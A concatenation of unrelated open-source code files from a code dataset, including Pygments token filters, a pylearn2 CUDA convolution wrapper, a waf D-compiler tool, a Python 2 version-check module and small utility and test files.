'XML+Smarty'), ('xml+velocity', 'XML+Velocity'), ('xquery', 'XQuery'), ('xslt', 'XSLT'), ('xtend', 'Xtend'), ('xul+mozpreproc', 'XUL+mozpreproc'), ('yaml', 'YAML'), ('yaml+jinja', 'YAML+Jinja'), ('zephir', 'Zephir')], default='python', max_length=100)),
('style', models.CharField(choices=[('algol', 'algol'), ('algol_nu', 'algol_nu'), ('autumn', 'autumn'), ('borland', 'borland'), ('bw', 'bw'), ('colorful', 'colorful'), ('default', 'default'), ('emacs', 'emacs'), ('friendly', 'friendly'), ('fruity', 'fruity'), ('igor', 'igor'), ('lovelace', 'lovelace'), ('manni', 'manni'), ('monokai', 'monokai'), ('murphy', 'murphy'), ('native', 'native'), ('paraiso-dark', 'paraiso-dark'), ('paraiso-light', 'paraiso-light'), ('pastie', 'pastie'), ('perldoc', 'perldoc'), ('rrt', 'rrt'), ('tango', 'tango'), ('trac', 'trac'), ('vim', 'vim'), ('vs', 'vs'), ('xcode', 'xcode')], default='friendly', max_length=100)),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='snippets', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('created',),
},
),
]
| bsd-2-clause |
NDNUtils/NDNSIM | .waf-1.8.12-f00e5b53f6bbeab1384a38c9cc5d51f7/waflib/Tools/dmd.py | 21 | 1487 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! https://waf.io/book/index.html#_obtaining_the_waf_file
import sys
from waflib.Tools import ar,d
from waflib.Configure import conf
@conf
def find_dmd(conf):
conf.find_program(['dmd','dmd2','ldc'],var='D')
out=conf.cmd_and_log(conf.env.D+['--help'])
if out.find("D Compiler v")==-1:
out=conf.cmd_and_log(conf.env.D+['-version'])
if out.find("based on DMD v1.")==-1:
conf.fatal("detected compiler is not dmd/ldc")
@conf
def common_flags_ldc(conf):
v=conf.env
v['DFLAGS']=['-d-version=Posix']
v['LINKFLAGS']=[]
v['DFLAGS_dshlib']=['-relocation-model=pic']
@conf
def common_flags_dmd(conf):
v=conf.env
v['D_SRC_F']=['-c']
v['D_TGT_F']='-of%s'
v['D_LINKER']=v['D']
v['DLNK_SRC_F']=''
v['DLNK_TGT_F']='-of%s'
v['DINC_ST']='-I%s'
v['DSHLIB_MARKER']=v['DSTLIB_MARKER']=''
v['DSTLIB_ST']=v['DSHLIB_ST']='-L-l%s'
v['DSTLIBPATH_ST']=v['DLIBPATH_ST']='-L-L%s'
v['LINKFLAGS_dprogram']=['-quiet']
v['DFLAGS_dshlib']=['-fPIC']
v['LINKFLAGS_dshlib']=['-L-shared']
v['DHEADER_ext']='.di'
v.DFLAGS_d_with_header=['-H','-Hf']
v['D_HDR_F']='%s'
def configure(conf):
conf.find_dmd()
if sys.platform=='win32':
out=conf.cmd_and_log(conf.env.D+['--help'])
if out.find("D Compiler v2.")>-1:
conf.fatal('dmd2 on Windows is not supported, use gdc or ldc2 instead')
conf.load('ar')
conf.load('d')
conf.common_flags_dmd()
conf.d_platform_flags()
if str(conf.env.D).find('ldc')>-1:
conf.common_flags_ldc()
| gpl-2.0 |
GjjvdBurg/ABED | abed/utils.py | 1 | 1481 | # -*- coding: utf-8 -*-
"""
Various utility functions used throughout abed
"""
from __future__ import print_function
import errno
import os
from .conf import settings
basename = os.path.basename
splitext = os.path.splitext
def wrap_text(text, max_length=120):
"""
Wraps the words into lines of a fixed length for prettier printing.
"""
words = []
for part in text.split("\n"):
words.extend(part.split(" "))
words.append("\n")
sentences = []
current_length = 0
sentence = ""
for word in words:
if word == "\n":
sentences.append(sentence)
sentence = ""
current_length = 0
continue
if current_length + len(word) + 1 <= max_length:
current_length += len(word) + 1
sentence += word + " "
else:
current_length = len(word) + 1
sentences.append(sentence)
sentence = word + " "
return "\n".join(sentences)
def mkdir(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def hash_from_filename(filename):
bname = basename(filename)
hsh = bname[: -len(settings.RESULT_EXTENSION)]
return hsh
def clean_str(string):
return "_".join(string.split(" ")).lower()
def touch(fname, times=None):
with open(fname, "a"):
os.utime(fname, times)
| gpl-2.0 |
lvduit/islab-portfolio-by-ghost | node_modules/grunt-docker/node_modules/docker/node_modules/pygmentize-bundled/vendor/pygments/build-3.3/pygments/filters/__init__.py | 93 | 11491 | # -*- coding: utf-8 -*-
"""
pygments.filters
~~~~~~~~~~~~~~~~
Module containing filter lookup functions and default
filters.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.token import String, Comment, Keyword, Name, Error, Whitespace, \
string_to_tokentype
from pygments.filter import Filter
from pygments.util import get_list_opt, get_int_opt, get_bool_opt, \
get_choice_opt, ClassNotFound, OptionError
from pygments.plugin import find_plugin_filters
def find_filter_class(filtername):
"""
Lookup a filter by name. Return None if not found.
"""
if filtername in FILTERS:
return FILTERS[filtername]
for name, cls in find_plugin_filters():
if name == filtername:
return cls
return None
def get_filter_by_name(filtername, **options):
"""
Return an instantiated filter. Options are passed to the filter
initializer if wanted. Raise a ClassNotFound if not found.
"""
cls = find_filter_class(filtername)
if cls:
return cls(**options)
else:
raise ClassNotFound('filter %r not found' % filtername)
def get_all_filters():
"""
Return a generator of all filter names.
"""
for name in FILTERS:
yield name
for name, _ in find_plugin_filters():
yield name
def _replace_special(ttype, value, regex, specialttype,
replacefunc=lambda x: x):
last = 0
for match in regex.finditer(value):
start, end = match.start(), match.end()
if start != last:
yield ttype, value[last:start]
yield specialttype, replacefunc(value[start:end])
last = end
if last != len(value):
yield ttype, value[last:]
class CodeTagFilter(Filter):
"""
Highlight special code tags in comments and docstrings.
Options accepted:
`codetags` : list of strings
A list of strings that are flagged as code tags. The default is to
highlight ``XXX``, ``TODO``, ``BUG`` and ``NOTE``.
"""
def __init__(self, **options):
Filter.__init__(self, **options)
tags = get_list_opt(options, 'codetags',
['XXX', 'TODO', 'BUG', 'NOTE'])
self.tag_re = re.compile(r'\b(%s)\b' % '|'.join([
re.escape(tag) for tag in tags if tag
]))
def filter(self, lexer, stream):
regex = self.tag_re
for ttype, value in stream:
if ttype in String.Doc or \
ttype in Comment and \
ttype not in Comment.Preproc:
for sttype, svalue in _replace_special(ttype, value, regex,
Comment.Special):
yield sttype, svalue
else:
yield ttype, value
class KeywordCaseFilter(Filter):
"""
Convert keywords to lowercase or uppercase or capitalize them, which
means first letter uppercase, rest lowercase.
This can be useful e.g. if you highlight Pascal code and want to adapt the
code to your styleguide.
Options accepted:
`case` : string
The casing to convert keywords to. Must be one of ``'lower'``,
``'upper'`` or ``'capitalize'``. The default is ``'lower'``.
"""
def __init__(self, **options):
Filter.__init__(self, **options)
case = get_choice_opt(options, 'case', ['lower', 'upper', 'capitalize'], 'lower')
self.convert = getattr(str, case)
def filter(self, lexer, stream):
for ttype, value in stream:
if ttype in Keyword:
yield ttype, self.convert(value)
else:
yield ttype, value
class NameHighlightFilter(Filter):
"""
Highlight a normal Name (and Name.*) token with a different token type.
Example::
filter = NameHighlightFilter(
names=['foo', 'bar', 'baz'],
tokentype=Name.Function,
)
This would highlight the names "foo", "bar" and "baz"
as functions. `Name.Function` is the default token type.
Options accepted:
`names` : list of strings
A list of names that should be given the different token type.
There is no default.
`tokentype` : TokenType or string
A token type or a string containing a token type name that is
used for highlighting the strings in `names`. The default is
`Name.Function`.
"""
def __init__(self, **options):
Filter.__init__(self, **options)
self.names = set(get_list_opt(options, 'names', []))
tokentype = options.get('tokentype')
if tokentype:
self.tokentype = string_to_tokentype(tokentype)
else:
self.tokentype = Name.Function
def filter(self, lexer, stream):
for ttype, value in stream:
if ttype in Name and value in self.names:
yield self.tokentype, value
else:
yield ttype, value
class ErrorToken(Exception):
pass
class RaiseOnErrorTokenFilter(Filter):
"""
Raise an exception when the lexer generates an error token.
Options accepted:
`excclass` : Exception class
The exception class to raise.
The default is `pygments.filters.ErrorToken`.
*New in Pygments 0.8.*
"""
def __init__(self, **options):
Filter.__init__(self, **options)
self.exception = options.get('excclass', ErrorToken)
try:
# issubclass() will raise TypeError if first argument is not a class
if not issubclass(self.exception, Exception):
raise TypeError
except TypeError:
raise OptionError('excclass option is not an exception class')
def filter(self, lexer, stream):
for ttype, value in stream:
if ttype is Error:
raise self.exception(value)
yield ttype, value
class VisibleWhitespaceFilter(Filter):
"""
Convert tabs, newlines and/or spaces to visible characters.
Options accepted:
`spaces` : string or bool
If this is a one-character string, spaces will be replaces by this string.
If it is another true value, spaces will be replaced by ``·`` (unicode
MIDDLE DOT). If it is a false value, spaces will not be replaced. The
default is ``False``.
`tabs` : string or bool
The same as for `spaces`, but the default replacement character is ``»``
(unicode RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK). The default value
is ``False``. Note: this will not work if the `tabsize` option for the
lexer is nonzero, as tabs will already have been expanded then.
`tabsize` : int
If tabs are to be replaced by this filter (see the `tabs` option), this
is the total number of characters that a tab should be expanded to.
The default is ``8``.
`newlines` : string or bool
The same as for `spaces`, but the default replacement character is ``¶``
(unicode PILCROW SIGN). The default value is ``False``.
`wstokentype` : bool
If true, give whitespace the special `Whitespace` token type. This allows
styling the visible whitespace differently (e.g. greyed out), but it can
disrupt background colors. The default is ``True``.
*New in Pygments 0.8.*
"""
def __init__(self, **options):
Filter.__init__(self, **options)
for name, default in list({'spaces': '·', 'tabs': '»', 'newlines': '¶'}.items()):
opt = options.get(name, False)
if isinstance(opt, str) and len(opt) == 1:
setattr(self, name, opt)
else:
setattr(self, name, (opt and default or ''))
tabsize = get_int_opt(options, 'tabsize', 8)
if self.tabs:
self.tabs += ' '*(tabsize-1)
if self.newlines:
self.newlines += '\n'
self.wstt = get_bool_opt(options, 'wstokentype', True)
def filter(self, lexer, stream):
if self.wstt:
spaces = self.spaces or ' '
tabs = self.tabs or '\t'
newlines = self.newlines or '\n'
regex = re.compile(r'\s')
def replacefunc(wschar):
if wschar == ' ':
return spaces
elif wschar == '\t':
return tabs
elif wschar == '\n':
return newlines
return wschar
for ttype, value in stream:
for sttype, svalue in _replace_special(ttype, value, regex,
Whitespace, replacefunc):
yield sttype, svalue
else:
spaces, tabs, newlines = self.spaces, self.tabs, self.newlines
# simpler processing
for ttype, value in stream:
if spaces:
value = value.replace(' ', spaces)
if tabs:
value = value.replace('\t', tabs)
if newlines:
value = value.replace('\n', newlines)
yield ttype, value
class GobbleFilter(Filter):
"""
Gobbles source code lines (eats initial characters).
This filter drops the first ``n`` characters off every line of code. This
may be useful when the source code fed to the lexer is indented by a fixed
amount of space that isn't desired in the output.
Options accepted:
`n` : int
The number of characters to gobble.
*New in Pygments 1.2.*
"""
def __init__(self, **options):
Filter.__init__(self, **options)
self.n = get_int_opt(options, 'n', 0)
def gobble(self, value, left):
if left < len(value):
return value[left:], 0
else:
return '', left - len(value)
def filter(self, lexer, stream):
n = self.n
left = n # How many characters left to gobble.
for ttype, value in stream:
# Remove ``left`` tokens from first line, ``n`` from all others.
parts = value.split('\n')
(parts[0], left) = self.gobble(parts[0], left)
for i in range(1, len(parts)):
(parts[i], left) = self.gobble(parts[i], n)
value = '\n'.join(parts)
if value != '':
yield ttype, value
class TokenMergeFilter(Filter):
"""
Merges consecutive tokens with the same token type in the output stream of a
lexer.
*New in Pygments 1.2.*
"""
def __init__(self, **options):
Filter.__init__(self, **options)
def filter(self, lexer, stream):
current_type = None
current_value = None
for ttype, value in stream:
if ttype is current_type:
current_value += value
else:
if current_type is not None:
yield current_type, current_value
current_type = ttype
current_value = value
if current_type is not None:
yield current_type, current_value
FILTERS = {
'codetagify': CodeTagFilter,
'keywordcase': KeywordCaseFilter,
'highlight': NameHighlightFilter,
'raiseonerror': RaiseOnErrorTokenFilter,
'whitespace': VisibleWhitespaceFilter,
'gobble': GobbleFilter,
'tokenmerge': TokenMergeFilter,
}
| mit |
ucsb-ilabs/shapematching | src/main/python/edu/ucsb/ilab/shapematching/readDat.py | 1 | 1489 | #!/usr/bin/env python
import sys, math, string, optparse, fileinput, struct, array
def main():
usage = "%prog [options] <datafile> <mssfile>"
version = "%prog 0.2\n Longbin Chen, longbinc@yahoo.com"
oparser = optparse.OptionParser(usage=usage, version=version)
oparser.add_option('-t', '--template', dest = 'template', default = None, help = 'template file ')
(options, args) = oparser.parse_args(sys.argv)
if len(args) != 3:
oparser.parse_args([sys.argv[0], "--help"])
sys.exit(1)
fileobj = open(args[1], 'rb')
fout = open(args[2], "w")
magicnum = fileobj.readline()
line2 = fileobj.readline()
N, dim = [int(x) for x in line2.strip(" ").split()]
line3 = fileobj.readline()
min, max= [float(x) for x in line3.strip(" ").split()]
if (options.template):
ftempl = open(options.template, "r")
header = ftempl.readline()
fout.write(header)
print magicnum,
print "%d lines, each line %d dim "% (N, dim)
print "%f min, %f max "% (min, max)
for i in range(N):
if (options.template):
dr = ftempl.readline().strip("\n\t").split("\t")
fout.write("\t".join(dr[0:4]))
for j in range(dim):
t = struct.unpack('>f', fileobj.read(4))
fout.write("\t%3.5f" % t[0])
fout.write("\n")
if (options.template):
ftempl.close()
fileobj.close()
fout.close()
if __name__ == '__main__':
main()
| gpl-2.0 |
JesseLivezey/pylearn2 | pylearn2/sandbox/cuda_convnet/img_acts.py | 49 | 14809 | """
A theano / pylearn2 wrapper for cuda-convnet's convFilterActs function.
"""
__authors__ = "David Warde-Farley and Ian Goodfellow"
__copyright__ = "Copyright 2010-2013, Universite de Montreal"
__credits__ = ["David Warde-Farley and Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
__email__ = "pylearn-dev@googlegroups"
"""
This module may contain code copied directly or modified from cuda-convnet.
The copyright and licensing notice for this code is reproduced below:
/*
* Copyright (c) 2011, Alex Krizhevsky (akrizhevsky@gmail.com)
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without modification,
* are permitted provided that the following conditions are met:
*
* - Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* - Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
"""
from theano.gradient import DisconnectedType
from theano.gof import Apply
from theano.sandbox.cuda import CudaNdarrayType
from theano.sandbox.cuda.basic_ops import as_cuda_ndarray_variable
from pylearn2.sandbox.cuda_convnet.base_acts import BaseActs
from pylearn2.sandbox.cuda_convnet.base_acts import UnimplementedError
# Must delay import to avoid circular import problem
FilterActs = None
WeightActs = None
class ImageActs(BaseActs):
"""
Transpose of FilterActs.
This is intended to be a very low-level, performance-oriented op.
It will not try to fix the input for you. That would slow it down.
The input must be in the right format. If not, it raises an exception.
Currently, this op must be inserted manually, not by optimizations.
Note that below the term "input" refers to the input to FilterActs.
This op does the tranpose of that, so its output is sized like
FilterActs' input.
* hid_acts: (output channels, rows, cols, batch_size)
* filters: (input channels, filter rows, filter cols, output channels).
Rows must be the same as cols. Output channels must be a multiple
of 16.
* output: (input channels, input rows, input cols, batch size)
Notes
-----
All of these convolution routines are optimized for the case when
the number of images (i.e. the minibatch size) is a multiple of 128.
Other batch sizes will work, but Alex "made no attempt whatsoever
to make them work fast."
"""
# __eq__ and __hash__ are defined in BaseActs.
# If you add an __init__ method that adds new members to ImageActs,
# you may need to implement a new version of __eq__ and __hash__
# in ImageActs, that considers these parameters.
def make_node(self, hid_acts, filters, output_shape=None):
"""
.. todo::
WRITEME
Parameters
----------
hid_acts : WRITEME
filters : WRITEME
output_shape : 2-element TensorVariable, optional
The spatial shape of the image
"""
if not isinstance(hid_acts.type, CudaNdarrayType):
raise TypeError("ImageActs: expected hid_acts.type to be CudaNdarrayType, "
"got " + str(hid_acts.type))
if not isinstance(filters.type, CudaNdarrayType):
raise TypeError("ImageActs: expected filters.type to be CudaNdarrayType, "
"got " + str(filters.type))
if output_shape is None:
if self.stride != 1:
raise ValueError("You must specify an output_shape for ImageActs if the stride is not 1.")
hid_shape = hid_acts.shape[1:3]
kernel_shape = filters.shape[1:3]
output_shape = hid_shape + kernel_shape - 2 * self.pad - 1
assert hid_acts.ndim == 4
assert filters.ndim == 4
channels_broadcastable = filters.type.broadcastable[3]
batch_broadcastable = hid_acts.type.broadcastable[3]
# Computing whether the rows and columns are broadcastable requires doing
# arithmetic on quantities that are known only at runtime, like the specific
# shape of the image and kernel
rows_broadcastable = False
cols_broadcastable = False
targets_broadcastable = (channels_broadcastable, rows_broadcastable,
cols_broadcastable, batch_broadcastable)
targets_type = CudaNdarrayType(broadcastable=targets_broadcastable)
targets = targets_type()
return Apply(self, [hid_acts, filters, output_shape], [targets])
def flops(self, inputs, outputs):
""" Useful with the hack in profilemode to print the MFlops"""
hid_acts, filters, output_shape = inputs
out, = outputs
assert hid_acts[0] == filters[3]
flops = (hid_acts[3] * filters[0] * hid_acts[0] *
filters[1] * filters[2] *
hid_acts[1] * hid_acts[2] * 2)
return flops
def connection_pattern(self, node):
"""
.. todo::
WRITEME
"""
return [[1], [1], [0]]
def grad(self, inputs, g_outputs):
"""
.. todo::
WRITEME
"""
hid_acts, filters, output_shape = inputs
g_images, = g_outputs
g_images = as_cuda_ndarray_variable(g_images)
assert not isinstance(g_images, list)
global FilterActs
global WeightActs
if FilterActs is None:
from pylearn2.sandbox.cuda_convnet.filter_acts import FilterActs
from pylearn2.sandbox.cuda_convnet.weight_acts import WeightActs
g_filters = WeightActs(stride=self.stride,
partial_sum=self.partial_sum, pad=self.pad)(
g_images, hid_acts, filters.shape[1:3])[0]
assert not isinstance(g_filters, list)
g_hid_acts = FilterActs(stride=self.stride, pad=self.pad,
partial_sum=self.partial_sum)(g_images, filters)
return [g_hid_acts, g_filters, DisconnectedType()()]
def c_code(self, node, name, inputs, outputs, sub):
"""
.. todo::
WRITEME
"""
hid_acts, filters, output_shape = inputs
targets, = outputs
fail = sub['fail']
# convFilterActs will multiply targets by scaleTargets
# then add scaleOutput * (the convolution value)
# We could make use of this to implement an inplace
# addconv op but for this op we just want to compute
# the convolution so we set them to 0 and 1 respectively
# Note: there is another version of convFilterActs that
# does not take these arguments, but it is just a wrapper
# around the version that does take them, so we save
# a function call by using the version that we use.
basic_setup = """
#define scaleTargets 0
#define scaleOutput 1
"""
if self.dense_connectivity:
basic_setup += """
#define numGroups 1
"""
basic_setup += """
#define paddingStart (-%d)
""" % self.pad
basic_setup += """
#define moduleStride %d
""" % self.stride
if self.copy_non_contiguous:
raise UnimplementedError()
else:
basic_setup += "#define IMAGEACTS_COPY_NON_CONTIGUOUS 0\n"
# The amount of braces that must be closed at the end
num_braces = 0
# Convert images int nv_hid_acts, an NVMatrix, for compatibility
# with the cuda-convnet functions
setup_nv_hid_acts = self._argument_contiguity_check("hid_acts") + """
if (%(hid_acts)s->nd != 4)
{
PyErr_Format(PyExc_ValueError,
"hid_acts must have nd=4, got nd=%%i", %(hid_acts)s->nd);
%(fail)s;
}
{ //setup_nv_hid_acts brace 1
const int *hid_act_dims = CudaNdarray_HOST_DIMS(%(hid_acts)s);
const int numFilters = hid_act_dims[0];
const int hidActsSizeY = hid_act_dims[1];
const int hidActsSizeX = hid_act_dims[2];
//printf("hidActs shape: %%d %%d\\n", hidActsSizeY, hidActsSizeX);
const int batch_size = hid_act_dims[3];
NVMatrix nv_hid_acts(%(hid_acts)s, numFilters * hidActsSizeY *
hidActsSizeX, batch_size, "image_acts:nv_hid_acts");
int img_channels = -1;
"""
num_braces += 1
# Convert filters into nv_filters, an NVMatrix, for compatibility
# with the cuda-convnet functions
setup_nv_filters = self._argument_contiguity_check("filters") + """
if (%(filters)s->nd != 4)
{
PyErr_Format(PyExc_ValueError,
"filters must have nd=4, got nd=%%i", %(filters)s->nd);
%(fail)s;
}
{ // setup_nv_filters brace 1
const int * filters_dims = CudaNdarray_HOST_DIMS(%(filters)s);
const int filter_channels = filters_dims[0];
const int filter_rows = filters_dims[1];
const int filter_cols = filters_dims[2];
const int num_filters = filters_dims[3];
if ((num_filters %% (numGroups * 16)) != 0)
{
PyErr_Format(PyExc_ValueError,
"Each group must have a multiple of 16 channels, but num_filters %%%% (numGroups * 16) = %%d %%%% ( %%d * 16) = %%d.",
num_filters, numGroups, num_filters %% (numGroups * 16));
%(fail)s;
}
if (filter_rows != filter_cols)
{
PyErr_Format(PyExc_ValueError,
"filter must be square, but have shape (%%d, %%d).",
filter_rows, filter_cols);
%(fail)s;
}
else if (moduleStride > filter_rows) {
PyErr_Format(PyExc_ValueError,
"stride %%d greater than filter size (%%d, %%d)",
moduleStride, filter_rows, filter_cols);
%(fail)s;
}
{ // setup_nv_filters brace 2
NVMatrix nv_filters(%(filters)s, filter_channels * filter_rows *
filter_cols, num_filters, "img_acts:nv_filters");
"""
num_braces += 2
#target_rows = "(hidActsSizeY + filter_rows + 2 * paddingStart) * moduleStride - 1"
#target_cols = "(hidActsSizeX + filter_cols + 2 * paddingStart) * moduleStride - 1"
setup_nv_targets = """
#define numModulesY hid_act_dims[1]
#define numModulesX hid_act_dims[2]
npy_intp *shape_dims = PyArray_DIMS(%(output_shape)s);
npy_intp target_rows, target_cols;
PyArrayObject *casted_shape;
PyArray_Descr *intp_dtype;
if (PyArray_NDIM(%(output_shape)s) != 1) {
PyErr_Format(PyExc_ValueError,
"output shape must be a vector, got %%d-tensor",
PyArray_NDIM(%(output_shape)s));
%(fail)s;
}
else if (shape_dims[0] != 2)
{
PyErr_Format(PyExc_ValueError,
"output shape must be length 2, got %%d",
(int)shape_dims[0]);
%(fail)s;
}
else if ((PyArray_DESCR(%(output_shape)s))->kind != 'i' &&
(PyArray_DESCR(%(output_shape)s))->kind != 'u')
{
PyErr_SetString(PyExc_TypeError,
"output shape must have integer or uint dtype");
%(fail)s;
}
intp_dtype = PyArray_DescrFromType(NPY_INTP);
casted_shape = (PyArrayObject *)PyArray_CastToType(%(output_shape)s,
intp_dtype, 0);
target_rows = *((npy_intp *)PyArray_GETPTR1(casted_shape, 0));
target_cols = *((npy_intp *)PyArray_GETPTR1(casted_shape, 1));
{
int target_dims [] = {
filter_channels,
target_rows,
target_cols,
batch_size };
#define filterSize filter_rows
#define MAX_ROWS (paddingStart + (numModulesY-1) * moduleStride + filterSize)
if ((target_rows > MAX_ROWS)
|| (paddingStart + (numModulesX-1) * moduleStride + filterSize < target_cols))
{
PyErr_Format(PyExc_ValueError, "pylearn2.sandbox.cuda_convnet.image_acts.ImageActs: incompatible target image size (%%d, %%d), maximum (%%d, %%d)",
(int)target_rows, (int)target_cols,
(int)MAX_ROWS,
(int)(paddingStart + (numModulesX-1) * moduleStride + filterSize));
%(fail)s;
}
if (CudaNdarray_prep_output(& %(targets)s, 4, target_dims))
{
%(fail)s;
}
{ // setup_nv_filters brace # 1
const int imgSizeY = (int)target_rows;
const int imgSizeX = (int)target_cols;
NVMatrix nv_targets(%(targets)s, target_dims[0] * target_dims[1]
* target_dims[2], target_dims[3], "image_acts: nv_targets");
"""
num_braces += 2
# note: numFilters is not specified here. it is determined by
# nv_filters.getNumCols()
#
# note: the size of the filters is determined by dividing
# nv_filters.getNumRows() by numFilterColors
#
do_convolution = """
convImgActs(nv_hid_acts, nv_filters, nv_targets,
imgSizeY, imgSizeX, numModulesY,
paddingStart, moduleStride, filter_channels,
numGroups);
"""
braces = '}' * num_braces
rval = basic_setup + \
setup_nv_hid_acts + \
setup_nv_filters + \
setup_nv_targets + \
do_convolution + \
braces
rval = rval % locals()
return rval
def c_code_cache_version(self):
"""
.. todo::
WRITEME
"""
return (9,)
| bsd-3-clause |
vlachoudis/sl4a | python/src/Tools/versioncheck/pyversioncheck.py | 98 | 4051 | """pyversioncheck - Module to help with checking versions"""
import types
import rfc822
import urllib
import sys
# Verbose options
VERBOSE_SILENT=0 # Single-line reports per package
VERBOSE_NORMAL=1 # Single-line reports per package, more info if outdated
VERBOSE_EACHFILE=2 # Report on each URL checked
VERBOSE_CHECKALL=3 # Check each URL for each package
# Test directory
## urllib bug: _TESTDIR="ftp://ftp.cwi.nl/pub/jack/python/versiontestdir/"
_TESTDIR="http://www.cwi.nl/~jack/versiontestdir/"
def versioncheck(package, url, version, verbose=0):
ok, newversion, fp = checkonly(package, url, version, verbose)
if verbose > VERBOSE_NORMAL:
return ok
if ok < 0:
print '%s: No correctly formatted current version file found'%(package)
elif ok == 1:
print '%s: up-to-date (version %s)'%(package, version)
else:
print '%s: version %s installed, version %s found:' % \
(package, version, newversion)
if verbose > VERBOSE_SILENT:
while 1:
line = fp.readline()
if not line: break
sys.stdout.write('\t'+line)
return ok
def checkonly(package, url, version, verbose=0):
if verbose >= VERBOSE_EACHFILE:
print '%s:'%package
if type(url) == types.StringType:
ok, newversion, fp = _check1version(package, url, version, verbose)
else:
for u in url:
ok, newversion, fp = _check1version(package, u, version, verbose)
if ok >= 0 and verbose < VERBOSE_CHECKALL:
break
return ok, newversion, fp
def _check1version(package, url, version, verbose=0):
if verbose >= VERBOSE_EACHFILE:
print ' Checking %s'%url
try:
fp = urllib.urlopen(url)
except IOError, arg:
if verbose >= VERBOSE_EACHFILE:
print ' Cannot open:', arg
return -1, None, None
msg = rfc822.Message(fp, seekable=0)
newversion = msg.getheader('current-version')
if not newversion:
if verbose >= VERBOSE_EACHFILE:
print ' No "Current-Version:" header in URL or URL not found'
return -1, None, None
version = version.lower().strip()
newversion = newversion.lower().strip()
if version == newversion:
if verbose >= VERBOSE_EACHFILE:
print ' Version identical (%s)'%newversion
return 1, version, fp
else:
if verbose >= VERBOSE_EACHFILE:
print ' Versions different (installed: %s, new: %s)'% \
(version, newversion)
return 0, newversion, fp
def _test():
print '--- TEST VERBOSE=1'
print '--- Testing existing and identical version file'
versioncheck('VersionTestPackage', _TESTDIR+'Version10.txt', '1.0', verbose=1)
print '--- Testing existing package with new version'
versioncheck('VersionTestPackage', _TESTDIR+'Version11.txt', '1.0', verbose=1)
print '--- Testing package with non-existing version file'
versioncheck('VersionTestPackage', _TESTDIR+'nonexistent.txt', '1.0', verbose=1)
print '--- Test package with 2 locations, first non-existing second ok'
versfiles = [_TESTDIR+'nonexistent.txt', _TESTDIR+'Version10.txt']
versioncheck('VersionTestPackage', versfiles, '1.0', verbose=1)
print '--- TEST VERBOSE=2'
print '--- Testing existing and identical version file'
versioncheck('VersionTestPackage', _TESTDIR+'Version10.txt', '1.0', verbose=2)
print '--- Testing existing package with new version'
versioncheck('VersionTestPackage', _TESTDIR+'Version11.txt', '1.0', verbose=2)
print '--- Testing package with non-existing version file'
versioncheck('VersionTestPackage', _TESTDIR+'nonexistent.txt', '1.0', verbose=2)
print '--- Test package with 2 locations, first non-existing second ok'
versfiles = [_TESTDIR+'nonexistent.txt', _TESTDIR+'Version10.txt']
versioncheck('VersionTestPackage', versfiles, '1.0', verbose=2)
if __name__ == '__main__':
_test()
| apache-2.0 |
Tankypon/ubuntu-make | umake/ui/__init__.py | 13 | 1845 | # -*- coding: utf-8 -*-
# Copyright (C) 2014 Canonical
#
# Authors:
# Didier Roche
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; version 3.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
"""Abstracted UI interface that will be overriden by different UI types"""
from gi.repository import GLib
from umake.tools import Singleton, MainLoop
class UI(object, metaclass=Singleton):
currentUI = None
def __init__(self, current_UI):
UI.currentUI = current_UI
@classmethod
def return_main_screen(cls, status_code=0):
cls.currentUI._return_main_screen(status_code=status_code)
@classmethod
@MainLoop.in_mainloop_thread
def display(cls, contentType):
"""display in main thread this UI contentType. Can be delayed by 50 ms, like for pulse or message"""
# TODO: add check for current framework == framework sending contentType
cls.currentUI._display(contentType)
@classmethod
@MainLoop.in_mainloop_thread
def delayed_display(cls, contentType):
GLib.timeout_add(50, cls._one_time_wrapper, cls.currentUI._display, contentType)
@staticmethod
def _one_time_wrapper(fun, contentType):
"""To be called with GLib.timeout_add(), return False to only have one call"""
fun(contentType)
return False
| gpl-3.0 |
Osmose/kitsune | kitsune/kbforums/tests/test_models.py | 15 | 5250 | import datetime
from nose.tools import eq_
from kitsune.kbforums.models import Thread
from kitsune.kbforums.tests import KBForumTestCase, thread, post as post_
from kitsune.sumo.urlresolvers import reverse
from kitsune.sumo.helpers import urlparams
from kitsune.users.tests import user
from kitsune.wiki.tests import document
class KBForumModelTestCase(KBForumTestCase):
def test_thread_absolute_url(self):
t = thread(save=True)
